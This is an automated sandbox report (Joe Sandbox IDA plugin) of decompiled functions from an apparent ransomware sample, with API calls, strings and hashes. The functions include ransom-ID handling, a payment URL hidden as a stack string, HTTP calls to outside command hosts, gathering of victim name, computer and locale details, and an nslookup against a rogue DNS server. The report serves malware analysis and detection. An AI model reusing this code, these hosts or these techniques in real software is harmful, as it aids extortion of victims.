Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 6c1652a689c119a0fba640258677ad163027ce8b48fdcbf2c407d7e096e2327e
Instruction ID: 0cc8ac232a8d103194aa67174b9b5ce8fb9362593cfdf1c75b4f595713190feb
Opcode Fuzzy Hash: 6c1652a689c119a0fba640258677ad163027ce8b48fdcbf2c407d7e096e2327e
Instruction Fuzzy Hash: 4E518E71148341AEE3109F618C1DB5BBBE4EF44B44F50441DFA88A62D0F7B49549CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00D740A0 Relevance: 47.4, APIs: 7, Strings: 20, Instructions: 167
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 47%

			E00D740A0(void* __ecx) {
				char _v148;
				char _v152;
				void* _v156;
				short _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				char _v232;
				WCHAR* _v236;
				WCHAR* _v240;
				void* _t44;
				void* _t48;
				void* _t50;
				signed int _t51;
				void* _t52;
				WCHAR* _t56;
				signed short _t60;
				signed short* _t61;
				WCHAR* _t68;
				signed int _t73;
				signed int _t74;
				void* _t77;
				void* _t80;
				long _t83;
				WCHAR* _t84;
				signed int _t87;
				void* _t88;
				WCHAR* _t90;
				void* _t92;
				WCHAR* _t113;

				if( *0xd82b04 != 0) {
					L25:
					return _t44;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E00D739B0( &_v148);
				E00D76D90( &_v236);
				_t87 = E00D76BA0( &_v236);
				_t83 = 0x42 + _t87 * 2;
				_t48 = VirtualAlloc(0, _t83, 0x3000, 0x40);
				_v240 = _t48;
				if(_t48 == 0 || 0x40 + _t87 * 2 >= _t83) {
					_t88 = 0;
				} else {
					_t88 = _t48;
				}
				E00D769A0( &_v152, _t88);
				_t50 = E00D77BA0(_t88, L"ransom_id=");
				_t51 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xd80940]");
				_t68 = 0xd82000;
				_t77 = 0xad;
				_t90 = _t50 + _t51 * 2;
				_t52 = 0xad0;
				_v240 = _t90;
				do {
					_t13 =  &(_t68[8]); // 0x541054b
					_t68 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t77 = _t77 - 1;
				} while (_t77 != 0);
				do {
					 *(_t52 + 0xd82000) =  *(_t52 + 0xd82000) ^ 0x00000005;
					_t52 = _t52 + 1;
				} while (_t52 < 0xad6);
				 *0xd82b04 = 0xd82000;
				_t84 = E00D77BA0(0xd82000, L"{USERID}");
				if(_t84 == 0) {
					L21:
					_v232 = 0x740068;
					_v228 = 0x700074;
					_v224 = 0x2f003a;
					_v220 = 0x67002f;
					_v216 = 0x630064;
					_v212 = 0x670062;
					_v208 = 0x760068;
					_v204 = 0x79006a;
					_v200 = 0x790071;
					_v196 = 0x6a0037;
					_v192 = 0x6c0063;
					_v188 = 0x2e006b;
					_v184 = 0x6e006f;
					_v180 = 0x6f0069;
					_v176 = 0x2e006e;
					_v172 = 0x6f0074;
					_v168 = 0x2f0070;
					_v164 = 0;
					_t113 =  *0xd82ae4; // 0x0
					if(_t113 == 0) {
						_t56 = VirtualAlloc(0, 0x400, 0x3000, 4);
						 *0xd82ae4 = _t56;
						if(_t56 != 0) {
							wsprintfW(_t56, L"%s%s",  &_v232, _t90);
						}
					}
					VirtualFree(_v156, 0, 0x8000);
					_t44 = E00D77720( &_v152);
					goto L25;
				}
				while(1) {
					L11:
					lstrcpyW(_t84, _t90);
					_t84[lstrlenW(_t84)] = 0x20;
					_t84 = 0xd82000;
					_t60 =  *0xd82000; // 0xfbfa
					if(_t60 == 0) {
						goto L21;
					}
					_t73 = _t60 & 0x0000ffff;
					_t92 = 0xd82000 - L"{USERID}";
					do {
						_t61 = L"{USERID}";
						if(_t73 == 0) {
							goto L19;
						}
						while(1) {
							_t74 =  *_t61 & 0x0000ffff;
							if(_t74 == 0) {
								break;
							}
							_t80 = ( *(_t92 + _t61) & 0x0000ffff) - _t74;
							if(_t80 != 0) {
								L18:
								if( *_t61 == 0) {
									break;
								}
								goto L19;
							}
							_t61 =  &(_t61[1]);
							if( *(_t92 + _t61) != _t80) {
								continue;
							}
							goto L18;
						}
						_t90 = _v236;
						goto L11;
						L19:
						_t20 =  &(_t84[1]); // 0x5280528
						_t73 =  *_t20 & 0x0000ffff;
						_t84 =  &(_t84[1]);
						_t92 = _t92 + 2;
					} while (_t73 != 0);
					_t90 = _v236;
					goto L21;
				}
				goto L21;
			}

0x00d740b5
0x00d7431c
0x00d74321
0x00d74321
0x00d740bb
0x00d740bc
0x00d740be
0x00d740bf
0x00d740c4
0x00d740c6
0x00d740c7
0x00d740c9
0x00d740ca
0x00d740cc
0x00d740cd
0x00d740cf
0x00d740d0
0x00d740d5
0x00d740d7
0x00d740d8
0x00d740e1
0x00d740ea
0x00d740f8
0x00d74101
0x00d7410b
0x00d74111
0x00d74117
0x00d74128
0x00d74124
0x00d74124
0x00d74124
0x00d7412f
0x00d7413b
0x00d74147
0x00d7414d
0x00d74155
0x00d7415a
0x00d7415f
0x00d74162
0x00d74167
0x00d74170
0x00d74170
0x00d74170
0x00d74173
0x00d74178
0x00d7417c
0x00d74181
0x00d74181
0x00d74190
0x00d74190
0x00d74197
0x00d74198
0x00d741a4
0x00d741b8
0x00d741bc
0x00d7423a
0x00d7423c
0x00d74244
0x00d7424c
0x00d74254
0x00d7425c
0x00d74264
0x00d7426c
0x00d74274
0x00d7427c
0x00d74284
0x00d7428c
0x00d74294
0x00d7429c
0x00d742a4
0x00d742ac
0x00d742b4
0x00d742bc
0x00d742c4
0x00d742c9
0x00d742cf
0x00d742de
0x00d742e4
0x00d742eb
0x00d742f9
0x00d742ff
0x00d742eb
0x00d7430d
0x00d74317
0x00000000
0x00d74317
0x00d741c0
0x00d741c0
0x00d741c2
0x00d741d4
0x00d741d8
0x00d741dd
0x00d741e6
0x00000000
0x00000000
0x00d741ea
0x00d741ed
0x00d741f3
0x00d741f3
0x00d741fb
0x00000000
0x00000000
0x00d74200
0x00d74200
0x00d74206
0x00000000
0x00000000
0x00d74210
0x00d74212
0x00d7421d
0x00d74221
0x00000000
0x00000000
0x00000000
0x00d74221
0x00d74214
0x00d7421b
0x00000000
0x00000000
0x00000000
0x00d7421b
0x00d74322
0x00000000
0x00d74227
0x00d74227
0x00d74227
0x00d7422b
0x00d7422e
0x00d74231
0x00d74236
0x00000000
0x00d74236
0x00000000

APIs

Part of subcall function 00D739B0: GetProcessHeap.KERNEL32(?,?,00D74587,00000000,?,00000000), ref: 00D73A4C

Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 00D76DB7
Part of subcall function 00D76D90: GetUserNameW.ADVAPI32(00000000,?), ref: 00D76DC8
Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 00D76DE6
Part of subcall function 00D76D90: GetComputerNameW.KERNEL32 ref: 00D76DF0
Part of subcall function 00D76D90: VirtualAlloc.KERNELBASE(00000000,00000080,00003000,00000004), ref: 00D76E10
Part of subcall function 00D76D90: wsprintfW.USER32 ref: 00D76E51
Part of subcall function 00D76D90: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 00D76E6E
Part of subcall function 00D76D90: RegOpenKeyExW.ADVAPI32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 00D76E92
Part of subcall function 00D76D90: RegQueryValueExW.ADVAPI32(00000000,LocaleName,00000000,00000000,?,?), ref: 00D76EB6
Part of subcall function 00D76D90: RegCloseKey.ADVAPI32(00000000), ref: 00D76ED2

Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76BF2
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76BFD
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C13
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C1E
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(00D748B6,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C34
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C3F
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C55
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C60
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C76
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C81
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76C97
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CA2
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CC1
Part of subcall function 00D76BA0: lstrlenW.KERNEL32(?,?,?,?,00D74599,00000000,?,00000000,00000000,?,00000000), ref: 00D76CCC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D7410B
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D74147
lstrcpyW.KERNEL32 ref: 00D741C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D741C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00D742DE

Strings

o, xrefs: 00D7429C
k, xrefs: 00D74294
:, xrefs: 00D7424C
ransom_id=, xrefs: 00D74134, 00D74140
%s%s, xrefs: 00D742F3
{USERID}, xrefs: 00D7419F, 00D741ED, 00D741F3
i, xrefs: 00D742A4
j, xrefs: 00D74274
n, xrefs: 00D742AC
d, xrefs: 00D7425C
t, xrefs: 00D74244
h, xrefs: 00D7426C
p, xrefs: 00D742BC
7, xrefs: 00D74284
/, xrefs: 00D74254
c, xrefs: 00D7428C
q, xrefs: 00D7427C
b, xrefs: 00D74264
t, xrefs: 00D742B4
h, xrefs: 00D7423C

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$ransom_id=$t$t${USERID}
API String ID: 4100118565-914392996
Opcode ID: 4347343e90d4edfe3d06288b15d567110d153db8ea11f66f1fd193ba47a7bddb
Instruction ID: a8aafa2ae7b22a1cd22f4f13a4a1e3ba89d161eb0dfdf5d1acbee4d8b8bd3087
Opcode Fuzzy Hash: 4347343e90d4edfe3d06288b15d567110d153db8ea11f66f1fd193ba47a7bddb
Instruction Fuzzy Hash: 6251F2705143009BE721AF24DC19B3BBBE5FB90704F94891CF989AB290F7B09944CBB6

Uniqueness

Uniqueness Score: -1.00%

Function 00D77A00 Relevance: 43.9, APIs: 13, Strings: 12, Instructions: 132
networkfilememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D77A00(void* __ecx, long _a4, intOrPtr _a8, void* _a12, long _a16, void* _a20, intOrPtr _a24, WCHAR* _a36, WCHAR* _a40, long _a44) {
				long _v8;
				void* _v12;
				void* _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				short _v64;
				void* _t38;
				void* _t40;
				long _t55;
				long _t60;
				WCHAR* _t63;
				void* _t64;
				void* _t65;
				void* _t66;
				void* _t68;

				_t65 = __ecx;
				_t38 =  *(__ecx + 4);
				if(_t38 != 0) {
					InternetCloseHandle(_t38);
				}
				E00D777F0(_t65);
				_t40 = InternetConnectW( *(_t65 + 4), _a4, 0x50, 0, 0, 3, 0, 0);
				_t66 = _t40;
				_v8 = 0;
				_v12 = _t66;
				if(_t66 != 0) {
					_t63 = VirtualAlloc(0, 0x2800, 0x3000, 0x40);
					_v16 = _t63;
					wsprintfW(_t63, L"%s", _a8);
					_t64 = HttpOpenRequestW(_t66, _a36, _t63, L"HTTP/1.1", 0, 0, 0x8404f700, 0);
					if(_t64 != 0) {
						_v64 = 0x6f0048;
						_v20 = 0;
						_v60 = 0x740073;
						_v56 = 0x20003a;
						_v52 = 0x6f006e;
						_v48 = 0x6f006d;
						_v44 = 0x650072;
						_v40 = 0x610072;
						_v36 = 0x73006e;
						_v32 = 0x6d006f;
						_v28 = 0x62002e;
						_v24 = 0x740069;
						if(HttpAddRequestHeadersW(_t64,  &_v64, 0xffffffff, 0) != 0) {
							if(HttpSendRequestW(_t64, _a40, _a44, _a12, _a16) == 0) {
								GetLastError();
							} else {
								_t68 = _a20;
								_t60 = _a24 - 1;
								_a4 = 0;
								if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
									while(1) {
										_t55 = _a4;
										if(_t55 == 0) {
											goto L13;
										}
										 *((char*)(_t55 + _t68)) = 0;
										_a4 = 0;
										_v8 = 1;
										if(InternetReadFile(_t64, _t68, _t60,  &_a4) != 0) {
											continue;
										} else {
										}
										goto L13;
									}
								}
							}
						}
					}
					L13:
					InternetCloseHandle(_t64);
					InternetCloseHandle(_v12);
					VirtualFree(_v16, 0, 0x8000);
					return _v8;
				} else {
					return _t40;
				}
			}

0x00d77a08
0x00d77a0b
0x00d77a10
0x00d77a13
0x00d77a13
0x00d77a1b
0x00d77a32
0x00d77a38
0x00d77a3a
0x00d77a41
0x00d77a46
0x00d77a68
0x00d77a70
0x00d77a73
0x00d77a97
0x00d77a9b
0x00d77aa3
0x00d77aab
0x00d77ab6
0x00d77abd
0x00d77ac4
0x00d77acb
0x00d77ad2
0x00d77ad9
0x00d77ae0
0x00d77ae7
0x00d77aee
0x00d77af5
0x00d77b04
0x00d77b1b
0x00d77b6c
0x00d77b1d
0x00d77b23
0x00d77b26
0x00d77b2b
0x00d77b3a
0x00d77b40
0x00d77b40
0x00d77b45
0x00000000
0x00000000
0x00d77b47
0x00d77b52
0x00d77b59
0x00d77b68
0x00000000
0x00000000
0x00d77b6a
0x00000000
0x00d77b68
0x00d77b40
0x00d77b3a
0x00d77b1b
0x00d77b04
0x00d77b72
0x00d77b79
0x00d77b7e
0x00d77b8a
0x00d77b99
0x00d77a4e
0x00d77a4e
0x00d77a4e

APIs

InternetCloseHandle.WININET(?), ref: 00D77A13
InternetConnectW.WININET(?,00000000,00000050,00000000,00000000,00000003,00000000,00000000), ref: 00D77A32
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000040,?,?,?,?,?,?,?,?,00D76946,ipv4bot.whatismyipaddress.com,00D803B0,00000000), ref: 00D77A5F
wsprintfW.USER32 ref: 00D77A73
HttpOpenRequestW.WININET(00000000,?,00000000,HTTP/1.1,00000000,00000000,8404F700,00000000), ref: 00D77A91
HttpAddRequestHeadersW.WININET(00000000,006F0048,000000FF,00000000), ref: 00D77AFC
HttpSendRequestW.WININET(00000000,006F006D,006F006E,00000000,00740069), ref: 00D77B13
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00D77B32
InternetReadFile.WININET(00000000,0062002E,006D006E,00000000), ref: 00D77B60
GetLastError.KERNEL32 ref: 00D77B6C
InternetCloseHandle.WININET(00000000), ref: 00D77B79
InternetCloseHandle.WININET(00000000), ref: 00D77B7E
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,?,?,?,?,?,?,?,00D76946,ipv4bot.whatismyipaddress.com), ref: 00D77B8A

Strings

r, xrefs: 00D77AD9
., xrefs: 00D77AEE
H, xrefs: 00D77AA3
HTTP/1.1, xrefs: 00D77A87
o, xrefs: 00D77AE7
r, xrefs: 00D77AD2
:, xrefs: 00D77ABD
n, xrefs: 00D77AC4
s, xrefs: 00D77AB6
i, xrefs: 00D77AF5
m, xrefs: 00D77ACB
n, xrefs: 00D77AE0

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttpRequest$FileReadVirtual$AllocConnectErrorFreeHeadersLastOpenSendwsprintf
String ID: .$:$H$HTTP/1.1$i$m$n$n$o$r$r$s
API String ID: 3906118045-86075497
Opcode ID: a23c10ae23e6dd3156b5a2ef8fb376f494558506ee77b3a8a154ff4e7ff5c6ad
Instruction ID: 5e68104cc172fc60b5b30f8f8e2177ce4a0673013075d8da78a81418d70be7cf
Opcode Fuzzy Hash: a23c10ae23e6dd3156b5a2ef8fb376f494558506ee77b3a8a154ff4e7ff5c6ad
Instruction Fuzzy Hash: 55414F71A00309BBEB109F95DC49FAEBFB9EF04B55F148019F908A6290E7B19954CBB4

Uniqueness

Uniqueness Score: -1.00%

Function 00D74186 Relevance: 42.1, APIs: 5, Strings: 19, Instructions: 96
stringmemoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D74186(void* __eax, void* __ebp, WCHAR* _a12, char _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36, intOrPtr _a40, intOrPtr _a44, intOrPtr _a48, intOrPtr _a52, intOrPtr _a56, intOrPtr _a60, intOrPtr _a64, intOrPtr _a68, intOrPtr _a72, intOrPtr _a76, intOrPtr _a80, short _a84, void* _a92, char _a96) {
				void* _t31;
				void* _t35;
				WCHAR* _t36;
				signed short _t40;
				signed short* _t41;
				signed int _t46;
				signed int _t47;
				void* _t50;
				WCHAR* _t51;
				WCHAR* _t53;
				void* _t56;
				WCHAR* _t72;

				_t31 = __eax;
				do {
					 *(_t31 + 0xd82000) =  *(_t31 + 0xd82000) ^ 0x00000005;
					_t31 = _t31 + 1;
				} while (_t31 < 0xad6);
				 *0xd82b04 = 0xd82000;
				_t51 = E00D77BA0(0xd82000, L"{USERID}");
				if(_t51 != 0) {
					while(1) {
						L4:
						lstrcpyW(_t51, _t53);
						_t51[lstrlenW(_t51)] = 0x20;
						_t51 = 0xd82000;
						_t40 =  *0xd82000; // 0xfbfa
						if(_t40 == 0) {
							goto L14;
						}
						_t46 = _t40 & 0x0000ffff;
						_t56 = 0xd82000 - L"{USERID}";
						do {
							_t41 = L"{USERID}";
							if(_t46 == 0) {
								goto L12;
							} else {
								while(1) {
									_t47 =  *_t41 & 0x0000ffff;
									if(_t47 == 0) {
										break;
									}
									_t50 = ( *(_t56 + _t41) & 0x0000ffff) - _t47;
									if(_t50 != 0) {
										L11:
										if( *_t41 == 0) {
											break;
										} else {
											goto L12;
										}
									} else {
										_t41 =  &(_t41[1]);
										if( *(_t56 + _t41) != _t50) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L14;
								}
								_t53 = _a12;
								goto L4;
							}
							goto L14;
							L12:
							_t7 =  &(_t51[1]); // 0x5280528
							_t46 =  *_t7 & 0x0000ffff;
							_t51 =  &(_t51[1]);
							_t56 = _t56 + 2;
						} while (_t46 != 0);
						_t53 = _a12;
						goto L14;
					}
				}
				L14:
				_a16 = 0x740068;
				_a20 = 0x700074;
				_a24 = 0x2f003a;
				_a28 = 0x67002f;
				_a32 = 0x630064;
				_a36 = 0x670062;
				_a40 = 0x760068;
				_a44 = 0x79006a;
				_a48 = 0x790071;
				_a52 = 0x6a0037;
				_a56 = 0x6c0063;
				_a60 = 0x2e006b;
				_a64 = 0x6e006f;
				_a68 = 0x6f0069;
				_a72 = 0x2e006e;
				_a76 = 0x6f0074;
				_a80 = 0x2f0070;
				_a84 = 0;
				_t72 =  *0xd82ae4; // 0x0
				if(_t72 == 0) {
					_t36 = VirtualAlloc(0, 0x400, 0x3000, 4);
					 *0xd82ae4 = _t36;
					if(_t36 != 0) {
						wsprintfW(_t36, L"%s%s",  &_a16, _t53);
					}
				}
				VirtualFree(_a92, 0, 0x8000);
				_t35 = E00D77720( &_a96);
				return _t35;
			}

0x00d74186
0x00d74190
0x00d74190
0x00d74197
0x00d74198
0x00d741a4
0x00d741b8
0x00d741bc
0x00d741c0
0x00d741c0
0x00d741c2
0x00d741d4
0x00d741d8
0x00d741dd
0x00d741e6
0x00000000
0x00000000
0x00d741ea
0x00d741ed
0x00d741f3
0x00d741f3
0x00d741fb
0x00000000
0x00d74200
0x00d74200
0x00d74200
0x00d74206
0x00000000
0x00000000
0x00d74210
0x00d74212
0x00d7421d
0x00d74221
0x00000000
0x00000000
0x00000000
0x00000000
0x00d74214
0x00d74214
0x00d7421b
0x00000000
0x00000000
0x00000000
0x00000000
0x00d7421b
0x00000000
0x00d74212
0x00d74322
0x00000000
0x00d74322
0x00000000
0x00d74227
0x00d74227
0x00d74227
0x00d7422b
0x00d7422e
0x00d74231
0x00d74236
0x00000000
0x00d74236
0x00d741c0
0x00d7423a
0x00d7423c
0x00d74244
0x00d7424c
0x00d74254
0x00d7425c
0x00d74264
0x00d7426c
0x00d74274
0x00d7427c
0x00d74284
0x00d7428c
0x00d74294
0x00d7429c
0x00d742a4
0x00d742ac
0x00d742b4
0x00d742bc
0x00d742c4
0x00d742c9
0x00d742cf
0x00d742de
0x00d742e4
0x00d742eb
0x00d742f9
0x00d742ff
0x00d742eb
0x00d7430d
0x00d74317
0x00d74321

APIs

lstrcpyW.KERNEL32 ref: 00D741C2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 00D741C9
VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 00D742DE
wsprintfW.USER32 ref: 00D742F9
VirtualFree.KERNEL32(?,00000000,00008000), ref: 00D7430D

Strings

o, xrefs: 00D7429C
k, xrefs: 00D74294
:, xrefs: 00D7424C
%s%s, xrefs: 00D742F3
{USERID}, xrefs: 00D7419F, 00D741ED, 00D741F3
i, xrefs: 00D742A4
j, xrefs: 00D74274
n, xrefs: 00D742AC
d, xrefs: 00D7425C
t, xrefs: 00D74244
h, xrefs: 00D7426C
p, xrefs: 00D742BC
7, xrefs: 00D74284
/, xrefs: 00D74254
c, xrefs: 00D7428C
q, xrefs: 00D7427C
b, xrefs: 00D74264
t, xrefs: 00D742B4
h, xrefs: 00D7423C

Memory Dump Source

Source File: 0000000B.00000002.293470647.0000000000D71000.00000020.00000001.01000000.00000006.sdmp, Offset: 00D70000, based on PE: true

Associated: 0000000B.00000002.293465200.0000000000D70000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293487625.0000000000D79000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293502970.0000000000D82000.00000008.00000001.01000000.00000006.sdmpDownload File
Associated: 0000000B.00000002.293545270.0000000000D84000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_d70000_qvvfpl.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFreelstrcpylstrlenwsprintf
String ID: %s%s$/$7$:$b$c$d$h$h$i$j$k$n$o$p$q$t$t${USERID}
API String ID: 4033391921-198931148
Opcode ID: 4cebda424e306eefc17e525efbe6391dab8f27d2a6ca7d41a0f06f4b601ed39e
Instruction ID: b15e715b867b66f15f7443569fa2814de13835dacca31aae1ed63a29a08f93f8
Opcode Fuzzy Hash: 4cebda424e306eefc17e525efbe6391dab8f27d2a6ca7d41a0f06f4b601ed39e
Instruction Fuzzy Hash: 3641BD700143408BD7219F10985873ABBF2FF81758F84891CF9899B2A1E7B28945CBB2

Uniqueness

Uniqueness Score: -1.00%

Function 00D74D60 Relevance: 40.4, APIs: 8, Strings: 15, Instructions: 101
pipememoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00D74D60(CHAR* __ecx, void* __edx) {
				struct _SECURITY_ATTRIBUTES _v16;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				short _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t24;
				void* _t37;
				CHAR* _t43;
				void* _t45;

				_v76 = 0x73006e;
				_v20 = 0;
				_t37 = __edx;
				_v16.lpSecurityDescriptor = 0;
				_t43 = __ecx;
				_v72 = 0x6f006c;
				_v68 = 0x6b006f;
				_v64 = 0x700075;
				_v60 = 0x250020;
				_v56 = 0x200053;
				_v52 = 0x6e0064;
				_v48 = 0x310073;
				_v44 = 0x73002e;
				_v40 = 0x70006f;
				_v36 = 0x6f0072;
				_v32 = 0x6e0064;
				_v28 = 0x2e0073;
				_v24 = 0x750072;
				_v16.nLength = 0xc;
				_v16.bInheritHandle = 1;
				_t24 = CreatePipe(0xd82b10, 0xd82b0c,  &_v16, 0);
				if(_t24 != 0) {
					_t24 = SetHandleInformation( *0xd82b10, 1, 0);
					if(_t24 == 0) {
						goto L1;
					} else {
						CreatePipe(0xd82b08, 0xd82b14,  &_v16, 0);
						_t24 = SetHandleInformation( *0xd82b14, 1, 0);
						if(_t24 == 0) {
							goto L1;
						} else {
							_t45 = VirtualAlloc(0, 0x2800, 0x3000, 4);
							if(_t45 == 0) {
								lstrcpyA(_t43, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t45,  &_v76, _t37);
								E00D74B10(_t45);
								E00D74CB0(_t37, _t43, _t37, _t43, _t45);
								VirtualFree(_t45, 0, 0x8000);
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t24 | 0xffffffff;
				}
			}

0x00d74d6b
0x00d74d73
0x00d74d77
0x00d74d79
0x00d74d7c
0x00d74d81
0x00d74d93
0x00d74d9a
0x00d74da1
0x00d74da8
0x00d74daf
0x00d74db6
0x00d74dbd
0x00d74dc4
0x00d74dcb
0x00d74dd2
0x00d74dd9
0x00d74de0
0x00d74de7
0x00d74dee
0x00d74df5
0x00d74dfd
0x00d74e19
0x00d74e1d
0x00000000
0x00d74e1f
0x00d74e2f
0x00d74e3f
0x00d74e43
0x00000000
0x00d74e45
0x00d74e59
0x00d74e5d
0x00d74e9b
0x00d74ea9
0x00d74e5f
0x00d74e65
0x00d74e70
0x00d74e79
0x00d74e86
0x00d74e94
0x00d74e94
0x00d74e5d
0x00d74e43
0x00d74dff
0x00d74dff
0x00d74e08
0x00d74e08

APIs

CreatePipe.KERNEL32(00D82B10,00D82B0C,?,00000000,00000000,00000001,00000000), ref: 00D74DF5
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00D74E19
CreatePipe.KERNEL32(00D82B08,00D82B14,0000000C,00000000), ref: 00D74E2F
SetHandleInformation.KERNEL32(00000001,00000000), ref: 00D74E3F
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 00D74E53
wsprintfW.USER32 ref: 00D74E65
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00D74E86

Strings

n, xrefs: 00D74D6B
s, xrefs: 00D74DD9
